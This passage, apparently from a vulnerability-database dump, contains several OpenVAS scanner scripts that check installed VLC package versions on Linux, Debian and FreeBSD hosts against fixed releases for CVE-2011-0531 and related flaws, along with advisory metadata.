USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow attackers to execute arbitrary code by\n tricking a user into opening a specially crafted MKV file.\n Impact Level: Application\";\ntag_affected = \"VLC media player version 1.1.6.1 and prior on Linux\";\ntag_insight = \"The flaw is due to an input validation error within the 'MKV_IS_ID'\n macro in 'modules/demux/mkv/mkv.hpp' of the MKV demuxer, when parsing the\n MKV file.\";\ntag_solution = \"Upgrade to the VLC media player version 1.1.7 or later,\n For updates refer to http://download.videolan.org/pub/videolan/vlc/\";\ntag_summary = \"The host is installed with VLC Media Player and is prone to\n arbitrary code execution vulnerability.\";\n\nif(description)\n{\n script_id(902339);\n script_version(\"$Revision: 7024 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-08-30 13:51:43 +0200 (Wed, 30 Aug 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-02-23 12:24:37 +0100 (Wed, 23 Feb 2011)\");\n script_cve_id(\"CVE-2011-0531\");\n script_bugtraq_id(46060);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"VLC Media Player '.mkv' Code Execution Vulnerability (Linux)\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/65045\");\n script_xref(name : \"URL\" , value : \"http://www.securitytracker.com/id?1025018\");\n\n script_copyright(\"Copyright (c) 2011 SecPod\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"secpod_vlc_media_player_detect_lin.nasl\");\n script_require_keys(\"VLCPlayer/Lin/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"executable_version_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n## Get the version from KB\nvlcVer = get_kb_item(\"VLCPlayer/Lin/Ver\");\nif(!vlcVer){\n exit(0);\n}\n\n## Check for VLC Media Player Version less than 1.1.7\nif(version_is_less(version:vlcVer, test_version:\"1.1.7\")){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:55:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0531"], "description": "The remote host is missing an update to vlc\nannounced via advisory DSA 2159-1.", "modified": "2017-07-07T00:00:00", "published": "2011-03-07T00:00:00", "id": "OPENVAS:68993", "href": "http://plugins.openvas.org/nasl.php?oid=68993", "type": "openvas", "title": "Debian Security Advisory DSA 2159-1 (vlc)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2159_1.nasl 6613 2017-07-07 12:08:40Z cfischer $\n# Description: Auto-generated from advisory DSA 2159-1 (vlc)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Dan Rosenberg discovered that insufficient input validation in VLC's\nprocessing of Matroska/WebM containers could lead to the execution of\narbitrary code.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.1.3-1squeeze3.\n\nThe version of vlc in the oldstable distribution (lenny) is affected\nby further issues and will be addressed in a followup DSA.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.1.7-1.\n\nWe recommend that you upgrade your vlc packages.\";\ntag_summary = \"The remote host is missing an update to vlc\nannounced via advisory DSA 2159-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202159-1\";\n\n\nif(description)\n{\n script_id(68993);\n script_version(\"$Revision: 6613 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:40 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-03-07 16:04:02 +0100 (Mon, 07 Mar 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-0531\");\n script_name(\"Debian Security Advisory DSA 2159-1 (vlc)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libvlc-dev\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvlc5\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvlccore-dev\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvlccore4\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mozilla-plugin-vlc\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-data\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-dbg\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-nox\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-fluidsynth\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-ggi\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-jack\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-notify\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-pulse\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-sdl\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-svg\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-svgalib\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-zvbi\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0531"], "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "modified": "2018-10-05T00:00:00", "published": "2011-03-05T00:00:00", "id": "OPENVAS:136141256231068956", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231068956", "type": "openvas", "title": "FreeBSD Ports: vlc", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: freebsd_vlc4.nasl 11762 2018-10-05 10:54:12Z cfischer $\n#\n# Auto generated from VID f9258873-2ee2-11e0-afcd-0015f2db7bde\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.68956\");\n script_version(\"$Revision: 11762 $\");\n script_cve_id(\"CVE-2011-0531\");\n script_bugtraq_id(46060);\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-05 12:54:12 +0200 (Fri, 05 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-03-05 22:25:39 +0100 (Sat, 05 Mar 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: vlc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsd\", \"ssh/login/freebsdrel\");\n\n script_tag(name:\"insight\", value:\"The following package is affected: vlc\");\n\n script_tag(name:\"solution\", value:\"Update your system with the appropriate patches or\n software upgrades.\");\n\n script_xref(name:\"URL\", value:\"http://www.videolan.org/security/sa1102.html\");\n script_xref(name:\"URL\", value:\"http://www.vuxml.org/freebsd/f9258873-2ee2-11e0-afcd-0015f2db7bde.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update to the system\n as announced in the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-bsd.inc\");\n\nvuln = FALSE;\ntxt = \"\";\n\nbver = portver(pkg:\"vlc\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.1.7\")<0) {\n txt += 'Package vlc version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\n\nif(vuln) {\n security_message(data:txt);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0531"], "description": "The remote host is missing an update to vlc\nannounced via advisory DSA 2159-1.", "modified": "2019-03-18T00:00:00", "published": "2011-03-07T00:00:00", "id": "OPENVAS:136141256231068993", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231068993", "type": "openvas", "title": "Debian Security Advisory DSA 2159-1 (vlc)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2159_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2159-1 (vlc)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.68993\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-03-07 16:04:02 +0100 (Mon, 07 Mar 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-0531\");\n script_name(\"Debian Security Advisory DSA 2159-1 (vlc)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB6\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202159-1\");\n script_tag(name:\"insight\", value:\"Dan Rosenberg discovered that insufficient input validation in VLC's\nprocessing of Matroska/WebM containers could lead to the execution of\narbitrary code.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.1.3-1squeeze3.\n\nThe version of vlc in the oldstable distribution (lenny) is affected\nby further issues and will be addressed in a followup DSA.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.1.7-1.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your vlc packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to vlc\nannounced via advisory DSA 2159-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libvlc-dev\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libvlc5\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libvlccore-dev\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libvlccore4\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mozilla-plugin-vlc\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-data\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-dbg\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-nox\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-fluidsynth\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-ggi\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-jack\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-notify\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-pulse\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-sdl\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-svg\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-svgalib\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-zvbi\", ver:\"1.1.3-1squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0522", "CVE-2011-0531", "CVE-2010-1441", "CVE-2010-3275", "CVE-2010-1442", "CVE-2010-3276"], "description": "The remote host is missing an update to vlc\nannounced via advisory DSA 2211-1.", "modified": "2019-03-18T00:00:00", "published": "2011-05-12T00:00:00", "id": "OPENVAS:136141256231069555", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231069555", "type": "openvas", "title": "Debian Security Advisory DSA 2211-1 (vlc)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2211_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2211-1 (vlc)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.69555\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-12 19:21:50 +0200 (Thu, 12 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-3275\", \"CVE-2010-3276\", \"CVE-2010-0522\", \"CVE-2010-1441\", \"CVE-2010-1442\", \"CVE-2011-0531\");\n script_name(\"Debian Security Advisory DSA 2211-1 (vlc)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(5|6)\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202211-1\");\n script_tag(name:\"insight\", value:\"Ricardo Narvaja discovered that missing input sanitising in VLC, a\nmultimedia player and streamer, could lead to the execution of arbitrary\ncode if a user is tricked into opening a malformed media file.\n\nThis update also provides updated packages for oldstable (lenny) for\nvulnerabilities, which have already been addressed in Debian stable\n(squeeze), either during the freeze or in DSA-2159.\n(CVE-2010-0522, CVE-2010-1441, CVE-2010-1442, CVE-2011-0531)\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 0.8.6.h-4+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.1.3-1squeeze4.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.1.8-1.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your vlc packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to vlc\nannounced via advisory DSA 2211-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libvlc0\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libvlc0-dev\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mozilla-plugin-vlc\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-nox\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-arts\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-esd\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-ggi\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-glide\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-jack\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-sdl\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-svgalib\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libvlc-dev\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libvlc5\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libvlccore-dev\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libvlccore4\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mozilla-plugin-vlc\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-data\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-dbg\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-nox\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-fluidsynth\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-ggi\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-jack\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-notify\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-pulse\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-sdl\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-svg\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-svgalib\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"vlc-plugin-zvbi\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:55:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0522", "CVE-2011-0531", "CVE-2010-1441", "CVE-2010-3275", "CVE-2010-1442", "CVE-2010-3276"], "description": "The remote host is missing an update to vlc\nannounced via advisory DSA 2211-1.", "modified": "2017-07-07T00:00:00", "published": "2011-05-12T00:00:00", "id": "OPENVAS:69555", "href": "http://plugins.openvas.org/nasl.php?oid=69555", "type": "openvas", "title": "Debian Security Advisory DSA 2211-1 (vlc)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2211_1.nasl 6613 2017-07-07 12:08:40Z cfischer $\n# Description: Auto-generated from advisory DSA 2211-1 (vlc)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ricardo Narvaja discovered that missing input sanitising in VLC, a\nmultimedia player and streamer, could lead to the execution of arbitrary\ncode if a user is tricked into opening a malformed media file.\n\nThis update also provides updated packages for oldstable (lenny) for\nvulnerabilities, which have already been addressed in Debian stable\n(squeeze), either during the freeze or in DSA-2159.\n(CVE-2010-0522, CVE-2010-1441, CVE-2010-1442, CVE-2011-0531)\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 0.8.6.h-4+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.1.3-1squeeze4.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.1.8-1.\n\nWe recommend that you upgrade your vlc packages.\";\ntag_summary = \"The remote host is missing an update to vlc\nannounced via advisory DSA 2211-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202211-1\";\n\n\nif(description)\n{\n script_id(69555);\n script_version(\"$Revision: 6613 